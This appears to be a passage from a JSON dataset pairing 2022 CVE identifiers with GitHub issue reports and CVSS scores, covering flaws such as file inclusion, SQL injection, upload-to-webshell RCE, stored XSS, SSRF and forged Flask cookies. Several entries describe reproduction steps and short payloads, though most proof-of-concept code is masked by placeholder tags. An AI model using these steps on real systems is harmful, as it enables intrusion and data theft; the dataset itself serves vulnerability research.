  80252. "CVE_ID": "CVE-2022-25465",
  80253. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2136",
  80254. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2136",
  80255. "Repo_new": "espruino/espruino",
  80256. "Issue_Created_At": "2022-01-29T16:21:46Z",
  80257. "description": "stack overflow APITAG in APITAG Environment APITAG Build APITAG Proof of concept ERRORTAG Stack Dump ERRORTAG Credit Q1IQ( APITAG",
  80258. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80259. "severity": "HIGH",
  80260. "baseScore": 7.8,
  80261. "impactScore": 5.9,
  80262. "exploitabilityScore": 1.8
  80263. },
  80264. {
  80265. "CVE_ID": "CVE-2022-25484",
  80266. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/715",
  80267. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/715",
  80268. "Repo_new": "appneta/tcpreplay",
  80269. "Issue_Created_At": "2022-02-15T07:37:33Z",
  80270. "description": "Bug] Reachable assertion in APITAG Describe the bug The assertion APITAG in APITAG at tree.c is reachable when the user uses tcpprep to open a crafted pcap file. The variable APITAG is assigned in APITAG at get.c. URLTAG However, when the datalink is APITAG or ERRORTAG , APITAG is not assigned, and the assertion is triggered. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Get the Tcpreplay source code (master NUMBERTAG f NUMBERTAG and compile it NUMBERTAG Run command: APITAG The POC file could be downloaded here: [POC_file URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG The GDB report: CODETAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG bit Tcpreplay Version NUMBERTAG master NUMBERTAG f NUMBERTAG",
  80271. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80272. "severity": "MEDIUM",
  80273. "baseScore": 5.5,
  80274. "impactScore": 3.6,
  80275. "exploitabilityScore": 1.8
  80276. },
  80277. {
  80278. "CVE_ID": "CVE-2022-25485",
  80279. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/24",
  80280. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/24",
  80281. "Repo_new": "cuppacms/cuppacms",
  80282. "Issue_Created_At": "2022-02-16T08:43:24Z",
  80283. "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in FILETAG . poc APITAG APITAG analysis FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post url without and lfi protected filter Repair suggestions you can check url ,for example check if it has .. then refuse this request",
  80284. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80285. "severity": "HIGH",
  80286. "baseScore": 7.8,
  80287. "impactScore": 5.9,
  80288. "exploitabilityScore": 1.8
  80289. },
  80290. {
  80291. "CVE_ID": "CVE-2022-25486",
  80292. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/25",
  80293. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/25",
  80294. "Repo_new": "cuppacms/cuppacms",
  80295. "Issue_Created_At": "2022-02-16T08:54:20Z",
  80296. "description": "Unauthorized local file inclusion (LFI) vulnerability exists via the APITAG parameter in FILETAG . poc APITAG FILETAG analysis location: FILETAG line NUMBERTAG APITAG APITAG and $cuppa >POST ERRORTAG go on ERRORTAG so the post APITAG without any lfi protected filter Repair suggestions you can check APITAG ,for example check if it has .. then refuse this request",
  80297. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80298. "severity": "HIGH",
  80299. "baseScore": 7.8,
  80300. "impactScore": 5.9,
  80301. "exploitabilityScore": 1.8
  80302. },
  80303. {
  80304. "CVE_ID": "CVE-2022-25486",
  80305. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/15",
  80306. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/15",
  80307. "Repo_new": "cuppacms/cuppacms",
  80308. "Issue_Created_At": "2022-01-04T14:09:43Z",
  80309. "description": "Non authenticated local file inclusion. Greetings, I found a LFI vulnerability in APITAG How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.",
  80310. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80311. "severity": "HIGH",
  80312. "baseScore": 7.8,
  80313. "impactScore": 5.9,
  80314. "exploitabilityScore": 1.8
  80315. },
  80316. {
  80317. "CVE_ID": "CVE-2022-25487",
  80318. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/256",
  80319. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/256",
  80320. "Repo_new": "thedigicraft/atom.cms",
  80321. "Issue_Created_At": "2022-02-16T13:50:57Z",
  80322. "description": "An Unauthorized Remote Code Execution vulnerability exists in APITAG NUMBERTAG An Unauthorized attacker can upload arbitrary file in the FILETAG and executing it on the server reaching the RCE. poc ERRORTAG APITAG you can find the filename in respose. APITAG then you get a shell in APITAG APITAG analysis file FILETAG line NUMBERTAG without any protect for upload files extension APITAG Repair suggestions set some filter about files extension",
  80323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80324. "severity": "CRITICAL",
  80325. "baseScore": 9.8,
  80326. "impactScore": 5.9,
  80327. "exploitabilityScore": 3.9
  80328. },
  80329. {
  80330. "CVE_ID": "CVE-2022-25494",
  80331. "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/16",
  80332. "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/16",
  80333. "Repo_new": "g33kyrash/online-banking-system",
  80334. "Issue_Created_At": "2022-02-17T07:58:38Z",
  80335. "description": "There is a SQL injection vulnerability in FILETAG . poc First visit FILETAG APITAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG APITAG analysis file FILETAG line NUMBERTAG ERRORTAG without any filter for username and password",
  80336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80337. "severity": "CRITICAL",
  80338. "baseScore": 9.8,
  80339. "impactScore": 5.9,
  80340. "exploitabilityScore": 3.9
  80341. },
  80342. {
  80343. "CVE_ID": "CVE-2022-25495",
  80344. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/26",
  80345. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/26",
  80346. "Repo_new": "cuppacms/cuppacms",
  80347. "Issue_Created_At": "2022-02-19T14:51:30Z",
  80348. "description": "An Remote Code Execution vulnerability exists in Cuppa cms via file upload function. An attacker can upload arbitrary file via the PATHTAG and executing it on the server reaching the RCE. poc after login in setting module,add 'php' as Allowed extensions APITAG APITAG then upload a php file and use burp or other soft intercept request and send to repeater change the path as \"../\" APITAG uploadfile name can be seen in response APITAG as we can know, APITAG is as same as APITAG so visit APITAG you can getshell APITAG",
  80349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80350. "severity": "CRITICAL",
  80351. "baseScore": 9.8,
  80352. "impactScore": 5.9,
  80353. "exploitabilityScore": 3.9
  80354. },
  80355. {
  80356. "CVE_ID": "CVE-2022-25497",
  80357. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/28",
  80358. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/28",
  80359. "Repo_new": "cuppacms/cuppacms",
  80360. "Issue_Created_At": "2022-02-19T16:22:14Z",
  80361. "description": "Unauthorized Arbitrary File Read vulnerability exists in APITAG An Unauthorized attacker can read arbitrary file via copy function poc CODETAG then visit APITAG APITAG",
  80362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80363. "severity": "MEDIUM",
  80364. "baseScore": 5.3,
  80365. "impactScore": 1.4,
  80366. "exploitabilityScore": 3.9
  80367. },
  80368. {
  80369. "CVE_ID": "CVE-2022-25498",
  80370. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/29",
  80371. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/29",
  80372. "Repo_new": "cuppacms/cuppacms",
  80373. "Issue_Created_At": "2022-02-19T17:39:40Z",
  80374. "description": "Unauthorized Remote Code Execution vulnerability exists in APITAG via APITAG function. An Unauthorized attacker can execute arbitrary php code via ERRORTAG , APITAG function poc ERRORTAG then APITAG is your webshell password is cmd APITAG analysis when parameter file is APITAG after base NUMBERTAG decode is ERRORTAG we can code inject into the last line, and the final result is our shellcode injected to the APITAG APITAG",
  80375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80376. "severity": "CRITICAL",
  80377. "baseScore": 9.8,
  80378. "impactScore": 5.9,
  80379. "exploitabilityScore": 3.9
  80380. },
  80381. {
  80382. "CVE_ID": "CVE-2022-25505",
  80383. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/27",
  80384. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/27",
  80385. "Repo_new": "taogogo/taocms",
  80386. "Issue_Created_At": "2022-02-16T12:15:56Z",
  80387. "description": "taocms NUMBERTAG SQL injection exists in the background. Vulnerability file address: PATHTAG FILETAG It can be seen that the update function does not filter the id. After obtaining the id with the columnsdata function, it is brought into the updatelist function to update the data. FILETAG Then bring the id into the getlist function for the select query FILETAG Finally, the id is brought into the updatelist function for an update As can be seen from the above, a total of three SQL statements were executed, and none of the ids were filtered. Vulnerability to reproduce: APITAG the environment locally, and then enter the background APITAG the Manage section, then click Edit, and finally click Submit FILETAG FILETAG APITAG use burpsuite to capture a packet and send the packet to the repeater module FILETAG APITAG vulnerability variable is id, and the payload is constructed as: and APITAG Click send, you can see that the successful delay is NUMBERTAG seconds\uff0cas mentioned earlier, this is because the SQL statement is executed NUMBERTAG times FILETAG Repair suggestion: filter by id",
  80388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80389. "severity": "CRITICAL",
  80390. "baseScore": 9.8,
  80391. "impactScore": 5.9,
  80392. "exploitabilityScore": 3.9
  80393. },
  80394. {
  80395. "CVE_ID": "CVE-2022-25506",
  80396. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/27",
  80397. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/27",
  80398. "Repo_new": "freetakteam/ui",
  80399. "Issue_Created_At": "2022-02-16T09:38:15Z",
  80400. "description": "SQL Injection on APITAG The API endpoint APITAG contains a SQL Injection into the APITAG Database that is handling the authentication process of the APITAG In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV Drone. From the SQL Injection it is possible to list all the Username, APITAG and Clear Text passwords in the database. Proof of Concept Posting the follwing snippet into a web browsers console will trigger the SQL Injection and return the name and password for each user in the APITAG table. ERRORTAG Will return the following response: FILETAG Which clearly shows the database results in clear text.",
  80401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80402. "severity": "MEDIUM",
  80403. "baseScore": 6.5,
  80404. "impactScore": 3.6,
  80405. "exploitabilityScore": 2.8
  80406. },
  80407. {
  80408. "CVE_ID": "CVE-2022-25507",
  80409. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/28",
  80410. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/28",
  80411. "Repo_new": "freetakteam/ui",
  80412. "Issue_Created_At": "2022-02-16T09:44:15Z",
  80413. "description": "XSS through Emergency Alert. In the APITAG UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter. Web Interface In the case of a XSS in the APITAG it is as simple as having a callsign with the payload of ERRORTAG which will trigger the Emergency function and display the emergency in the APITAG FILETAG FILETAG End User Device What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a NUMBERTAG TIC APITAG in Contact) or similar. This can be chained together with the API keys leakage in the response in order to obtain a server APITAG key for further exploitation, which can take a normal user in the field to a Web Server admin FILETAG FILETAG FILETAG",
  80414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80415. "severity": "MEDIUM",
  80416. "baseScore": 5.4,
  80417. "impactScore": 2.7,
  80418. "exploitabilityScore": 2.3
  80419. },
  80420. {
  80421. "CVE_ID": "CVE-2022-25508",
  80422. "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291",
  80423. "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/291",
  80424. "Repo_new": "freetakteam/freetakserver",
  80425. "Issue_Created_At": "2022-02-16T09:39:27Z",
  80426. "description": "Unauthenticated Public APITAG Endpoint. In the APITAG there is also the Endpoint PATHTAG which is unauthenticated. While this might not seem interesting at first, it is possible to broadcast new routes (suggested tracks to take) to every End User Device (EUD) connected to the server. This can create two issues, either create a Denial of Service situation where a malicious user can fill the entire map with routes, making it impossible to use the map in the EUD. The second scenario might be to create a route on which possible users might take and therefor control some of the paths and direct users into bad situations. FILETAG",
  80427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80428. "severity": "HIGH",
  80429. "baseScore": 7.5,
  80430. "impactScore": 3.6,
  80431. "exploitabilityScore": 3.9
  80432. },
  80433. {
  80434. "CVE_ID": "CVE-2022-25510",
  80435. "Issue_Url_old": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292",
  80436. "Issue_Url_new": "https://github.com/freetakteam/freetakserver/issues/292",
  80437. "Repo_new": "freetakteam/freetakserver",
  80438. "Issue_Created_At": "2022-02-16T09:47:16Z",
  80439. "description": "Hardcoded Flask Secrets Key APITAG Escalation\". In the sourcecode there are NUMBERTAG relevant places that the Flask Secrets Key are hardcoded. Flask signs all their client sessions with this secret key, usually defined in an APITAG Variable_. In this case though there's these three places that these are hardcoded into. FILETAG This gives a malicious user the ability to sign their own cookies (using for example: Flask Unsign URLTAG , and internally change the UID of the current user and assume any other user, for example UID NUMBERTAG which is the Admin. APITAG Escalation) Another interessting issue that you run into aswell is that having two Flask servers with the same _secret key_ makes it possible for a user to reuse a UID NUMBERTAG cookie from Server A, and apply that cookie to Server B logging in to the same UID NUMBERTAG APITAG APITAG bypass).",
  80440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  80441. "severity": "HIGH",
  80442. "baseScore": 8.8,
  80443. "impactScore": 5.9,
  80444. "exploitabilityScore": 2.8
  80445. },
  80446. {
  80447. "CVE_ID": "CVE-2022-25511",
  80448. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/29",
  80449. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/29",
  80450. "Repo_new": "freetakteam/ui",
  80451. "Issue_Created_At": "2022-02-16T09:49:50Z",
  80452. "description": "Arbitrary File Write APITAG UI APITAG Code Execution). User Interface Datapackage From the APITAG it is possible to (once logged in) upload APITAG directly to the server so that it is possible to download the zipped files on the EUD in the field. The route APITAG takes an argument APITAG which is not sanitized for either the Path or the Filename outside of the UI, which creates the issues that you can place any file, anywhere on the system. Albeit going this route will add some junk XML data into the end of the file, this making it extremely hard to achieve code execution through Python or Flask Templating. This was achieved using a transparent proxy to catch and modify the webrequest, but can also be achieved using something like FILETAG Proof Of Concept Request through Burpsuite: FILETAG File on system: FILETAG APITAG that the webserver is at that moment run as root, APITAG Recommended_) Bash equivalent APITAG `bash curl i s k X POST H APITAG APITAG H APITAG Bearer APITAG H APITAG Type: multipart/form data; boundary= APITAG H APITAG Encoding: gzip, deflate' data binary PATHTAG form data; name= assetfile ; filename= test.ext APITAG Type: PATHTAG PATHTAG ' URLTAG",
  80453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  80454. "severity": "MEDIUM",
  80455. "baseScore": 6.5,
  80456. "impactScore": 3.6,
  80457. "exploitabilityScore": 2.8
  80458. },
  80459. {
  80460. "CVE_ID": "CVE-2022-25512",
  80461. "Issue_Url_old": "https://github.com/FreeTAKTeam/UI/issues/26",
  80462. "Issue_Url_new": "https://github.com/freetakteam/ui/issues/26",
  80463. "Repo_new": "freetakteam/ui",
  80464. "Issue_Created_At": "2022-02-16T09:36:43Z",
  80465. "description": "API and Websocket Keys Leakage. The APITAG leaks the APITAG and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS. API Bearer Token FILETAG Websocket Token FILETAG",
  80466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80467. "severity": "HIGH",
  80468. "baseScore": 7.5,
  80469. "impactScore": 3.6,
  80470. "exploitabilityScore": 3.9
  80471. },
  80472. {
  80473. "CVE_ID": "CVE-2022-25523",
  80474. "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/697",
  80475. "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/697",
  80476. "Repo_new": "typesetter/typesetter",
  80477. "Issue_Created_At": "2022-03-23T20:18:51Z",
  80478. "description": "CSRF Vulnerabilities in APITAG [ CVETAG ]. APITAG NUMBERTAG was discovered to contain a Cross Site Request Forgery (CSRF) which is exploited via a crafted POST request. Vulnerability Type Cross Site Request Forgery (CSRF) Vendor of Product APITAG Affected Product Code Base APITAG NUMBERTAG are effected Affected Component All the POST requests Attack Type Remote Impact Escalation of Privileges true Attack Vector CODETAG Discoverer Danish Tariq Reference FILETAG URLTAG CVETAG",
  80479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80480. "severity": "HIGH",
  80481. "baseScore": 8.8,
  80482. "impactScore": 5.9,
  80483. "exploitabilityScore": 2.8
  80484. },
  80485. {
  80486. "CVE_ID": "CVE-2022-25568",
  80487. "Issue_Url_old": "https://github.com/ccrisan/motioneye/issues/2292",
  80488. "Issue_Url_new": "https://github.com/motioneye-project/motioneye/issues/2292",
  80489. "Repo_new": "motioneye-project/motioneye",
  80490. "Issue_Created_At": "2022-02-17T17:39:27Z",
  80491. "description": "Lack of a default user password exposes config file which contains potentially sensitive information. Last time I posted (in APITAG maybe) about the default lack of admin password/easily bruteforced password, leaving users open to remote code execution, and it was seen as a non issue, so this may also be a non issue to you. If a \"user\" password is unset, even if an \"admin\" password is set, the config file at the PATHTAG endpoint remains viewable to anybody that has access to the APITAG instance. Using Shodan, I've found a large amount of them open to the public. This config file contains some highly sensitive information such as email addresses and passwords for various services where uploading of files occur such as external FTP, SFTP, gmail, gdrive, telegram, and potentially others. I just wanted to post this so people know that even if they set an \"admin\" password, they also need to set a \"user\" password especially if their config contains sensitive information like credentials for an upload service and even more especially if they also expose their APITAG instance to the internet.",
  80492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80493. "severity": "HIGH",
  80494. "baseScore": 7.5,
  80495. "impactScore": 3.6,
  80496. "exploitabilityScore": 3.9
  80497. },
  80498. {
  80499. "CVE_ID": "CVE-2022-25574",
  80500. "Issue_Url_old": "https://github.com/aqianhei/aqian/issues/1",
  80501. "Issue_Url_new": "https://github.com/aqianhei/aqian/issues/1",
  80502. "Repo_new": "aqianhei/aqian",
  80503. "Issue_Created_At": "2022-02-18T06:39:38Z",
  80504. "description": "douphp. FILETAG",
  80505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80506. "severity": "MEDIUM",
  80507. "baseScore": 4.8,
  80508. "impactScore": 2.7,
  80509. "exploitabilityScore": 1.7
  80510. },
  80511. {
  80512. "CVE_ID": "CVE-2022-25585",
  80513. "Issue_Url_old": "https://github.com/union-home/unioncms/issues/5",
  80514. "Issue_Url_new": "https://github.com/union-home/unioncms/issues/5",
  80515. "Repo_new": "union-home/unioncms",
  80516. "Issue_Created_At": "2022-02-19T11:07:31Z",
  80517. "description": "Stored XSS exists. APITAG problem is in system settings basic settings default settings third party code write\uff1a APITAG alert NUMBERTAG APITAG Save, open the home page and the XSS code will pop up The problem is as follows\uff1a FILETAG APITAG background content management all management modules add a piece of content insert video in the content, write\uff1aimg src=\"x\" onerror=\"alert NUMBERTAG FILETAG Save, open the corresponding foreground article and background article will pop up XSS code The problem is as follows\uff1a FILETAG",
  80518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80519. "severity": "MEDIUM",
  80520. "baseScore": 5.4,
  80521. "impactScore": 2.7,
  80522. "exploitabilityScore": 2.3
  80523. },
  80524. {
  80525. "CVE_ID": "CVE-2022-25590",
  80526. "Issue_Url_old": "https://github.com/javahuang/SurveyKing/issues/7",
  80527. "Issue_Url_new": "https://github.com/javahuang/surveyking/issues/7",
  80528. "Repo_new": "javahuang/surveyking",
  80529. "Issue_Created_At": "2022-02-20T04:55:08Z",
  80530. "description": "There is a logout logic vulnerability in the background. Version NUMBERTAG First, log in to the background normally and send query requests. Pay attention to cookies FILETAG Then click the exit login button. At this time, the back end code does not delete the user's session, but just jumps to the login page. You can see that the requested data can still be obtained normally with the previous cookie. Then the attacker can log in to the system again with the help of the browser cache when the user exits. FILETAG Repair suggestion: when exiting the login, delete the user's session first, and then jump to the login page.",
  80531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  80532. "severity": "MEDIUM",
  80533. "baseScore": 6.5,
  80534. "impactScore": 3.6,
  80535. "exploitabilityScore": 2.8
  80536. },
  80537. {
  80538. "CVE_ID": "CVE-2022-25758",
  80539. "Issue_Url_old": "https://github.com/sasstools/scss-tokenizer/issues/45",
  80540. "Issue_Url_new": "https://github.com/sasstools/scss-tokenizer/issues/45",
  80541. "Repo_new": "sasstools/scss-tokenizer",
  80542. "Issue_Created_At": "2022-01-12T21:11:06Z",
  80543. "description": "CVETAG Might apply?. Dear SCSS Tokenizer Team, In scanning my node_modules for Regular Expression Denial of Service APITAG Affecting APITAG URLTAG and CVETAG URLTAG I encountered scss tokenizer with FILETAG with the same style regular expression that is cited in the CVE commit URLTAG . postcss APITAG scss tokenizer APITAG It's slightly different, and maybe worth your time to double check. I hope this helps.",
  80544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80545. "severity": "HIGH",
  80546. "baseScore": 7.5,
  80547. "impactScore": 3.6,
  80548. "exploitabilityScore": 3.9
  80549. },
  80550. {
  80551. "CVE_ID": "CVE-2022-25838",
  80552. "Issue_Url_old": "https://github.com/laravel/fortify/issues/201",
  80553. "Issue_Url_new": "https://github.com/laravel/fortify/issues/201",
  80554. "Repo_new": "laravel/fortify",
  80555. "Issue_Created_At": "2021-01-17T19:39:15Z",
  80556. "description": "Current NUMBERTAG fa solution can lock users out of their accounts. Version NUMBERTAG Laravel Version NUMBERTAG PHP Version NUMBERTAG Description: The current two factor authentication solution sets NUMBERTAG fa to enabled without requiring a confirmation (via TOTP) that the authenticator app is actually set up. Steps To Reproduce: The current solution works like this NUMBERTAG APITAG , the user's APITAG is stored NUMBERTAG fa is now enabled NUMBERTAG APITAG , show QR code and ask user to scan the code with their app NUMBERTAG APITAG , show recovery codes and ask the user to save them NUMBERTAG User abandons the process before setting up their authenticator app or saving the recovery codes and is now locked out of their account . They could abandon the process because they first need to choose one of the many TOTP generators in the app store, and get side tracked, or their session times out, or they click the back button, or close their tab, or their computer crashes, ... Definitely NUMBERTAG fa must not be enabled before it is confirmed by a generated OTP. How To Fix It NUMBERTAG APITAG generates a QR code from a new two factor secret that is stored in the session NUMBERTAG APITAG , show the recovery codes to the user, ask them to save them NUMBERTAG The user is asked to set up their authenticator app with this QR code and enter a resulting TOTP code. This confirms that they have set up their authenticator (else they cannot generate a valid code), and can also (by written explanation) be used as confirmation that recovery codes were stored in a safe place NUMBERTAG APITAG , receives a new parameter: code . The code is validated using the two factor secret stored in the session NUMBERTAG If the code is valid, the two factor secret from the session is written into the user table (= enabling NUMBERTAG fa, now for real). If not, then the response indicates that the user did not enter a valid code and must re try.",
  80557. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80558. "severity": "HIGH",
  80559. "baseScore": 8.1,
  80560. "impactScore": 5.9,
  80561. "exploitabilityScore": 2.2
  80562. },
  80563. {
  80564. "CVE_ID": "CVE-2022-25851",
  80565. "Issue_Url_old": "https://github.com/jpeg-js/jpeg-js/issues/105",
  80566. "Issue_Url_new": "https://github.com/jpeg-js/jpeg-js/issues/105",
  80567. "Repo_new": "jpeg-js/jpeg-js",
  80568. "Issue_Created_At": "2022-06-02T07:17:55Z",
  80569. "description": "jpeg js APITAG (infinite loop). The following input can create a infinite loop inside jpeg js causing it to never return: APITAG Based on some preliminary debugging it appears to be related to the following code: URLTAG Here APITAG and APITAG are initialized to zero, but since there are no components, the values are never modified, leading to a divide by zero error in the last two line (which set APITAG and APITAG to Infinity ). These values are later used inside the APITAG function, where the following loop condition never evaluates to false since APITAG is set to APITAG (i.e. APITAG ) at line NUMBERTAG in APITAG . URLTAG found using jsfuzz URLTAG",
  80570. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80571. "severity": "HIGH",
  80572. "baseScore": 7.5,
  80573. "impactScore": 3.6,
  80574. "exploitabilityScore": 3.9
  80575. },
  80576. {
  80577. "CVE_ID": "CVE-2022-25854",
  80578. "Issue_Url_old": "https://github.com/yairEO/tagify/issues/988",
  80579. "Issue_Url_new": "https://github.com/yaireo/tagify/issues/988",
  80580. "Repo_new": "yaireo/tagify",
  80581. "Issue_Created_At": "2022-02-16T15:50:15Z",
  80582. "description": "XSS in tagify's template wrapper. Prerequisites FILETAG Steps to reproduce NUMBERTAG Open the following forked Tagify's React Wrapper demo NUMBERTAG Notice line NUMBERTAG URLTAG where a APITAG variable is declared. This variable mocks data that came from an API or an input NUMBERTAG On the line NUMBERTAG URLTAG we use the APITAG variable to customize tags NUMBERTAG Once the demo app is rendered, open the APITAG tab and hover on the first input. It will fire the XSS. The following screenshot shows the XSS run on FILETAG APITAG The following screenshot shows the same XSS run in the dev build of the app. APITAG As you see, the tagify builds a new span with an attribute that was not supposed to be there.",
  80583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80584. "severity": "MEDIUM",
  80585. "baseScore": 5.4,
  80586. "impactScore": 2.7,
  80587. "exploitabilityScore": 2.3
  80588. },
  80589. {
  80590. "CVE_ID": "CVE-2022-25856",
  80591. "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1947",
  80592. "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1947",
  80593. "Repo_new": "argoproj/argo-events",
  80594. "Issue_Created_At": "2022-05-10T17:50:38Z",
  80595. "description": "Insecure path traversal in Git Trigger Source can lead to arbitrary file read. APITAG APITAG APITAG Severity | High | Difficulty | High Target | \u00a0 APITAG APITAG ERRORTAG No checks are made on this file at read time, which could lead an attacker to read files anywhere on the system. This could be achieved in at least three ways: Symbolic link in Git repository An attacker controls a Git repository that the victim uses in a Git Trigger Source. The attacker adds a file to the Git repository that is a symbolic link to a file containing sensitive information on the victims machine. Argo then clones the repository onto the victims machine, and the symbolic link is followed during file read on the marked line above. An attacker could now read the file containing sensitive information. Race condition An attacker who has limited access to the file system may be able to read arbitrary files by leveraging a race condition. The attacker could replace the git temp directory created by argo with a symbolic link to the directory containing the file to be read. This could be done anytime between the time it is created in (g APITAG and the file is read in the return statement of (g APITAG APITAG dir string). Malicious manifest An attacker controls a manifest for a Git Trigger Source that the victim creates. The manifest has a APITAG to a sensitive file anywhere on the victims machine, for example: CODETAG Recommendations Disallow symbolic links Check whether the file at APITAG is a symbolic link before it is is opened and read in (g APITAG Fail if it is. Sanitize APITAG This is includes checks for unsafe path patterns, such as: Check whether the string begins with \u201c/\u201d. Disallow \u201c..\u201d, \u201c\\\u201d, \u201c~\u201d in path. Other checks to ensure that only the files from the Git repository can be read",
  80596. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80597. "severity": "HIGH",
  80598. "baseScore": 7.5,
  80599. "impactScore": 3.6,
  80600. "exploitabilityScore": 3.9
  80601. },
  80602. {
  80603. "CVE_ID": "CVE-2022-25876",
  80604. "Issue_Url_old": "https://github.com/ospfranco/link-preview-js/issues/115",
  80605. "Issue_Url_new": "https://github.com/ospfranco/link-preview-js/issues/115",
  80606. "Repo_new": "ospfranco/link-preview-js",
  80607. "Issue_Created_At": "2022-05-25T07:33:47Z",
  80608. "description": "SSRF. Describe There is a way to bypass your regex to validate private & local networks. If we use FILETAG or URLTAG to link preview, we don't see it ( ERRORTAG ), but if we use a domain that resolved to APITAG we can. For example: localtest.me resolved to APITAG (localhost), i.e. If you 'curl APITAG you see your localhost. Similarly we can read any other private & local address, any port. To Reproduce Steps to reproduce NUMBERTAG Find domain that resolved to private address with reverse ip lookup or use localtest.me APITAG or devhead.net APITAG + APITAG + APITAG NUMBERTAG Write it to APITAG NUMBERTAG Done. You see your local domain. FILETAG",
  80609. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80610. "severity": "MEDIUM",
  80611. "baseScore": 5.5,
  80612. "impactScore": 3.6,
  80613. "exploitabilityScore": 1.8
  80614. },
  80615. {
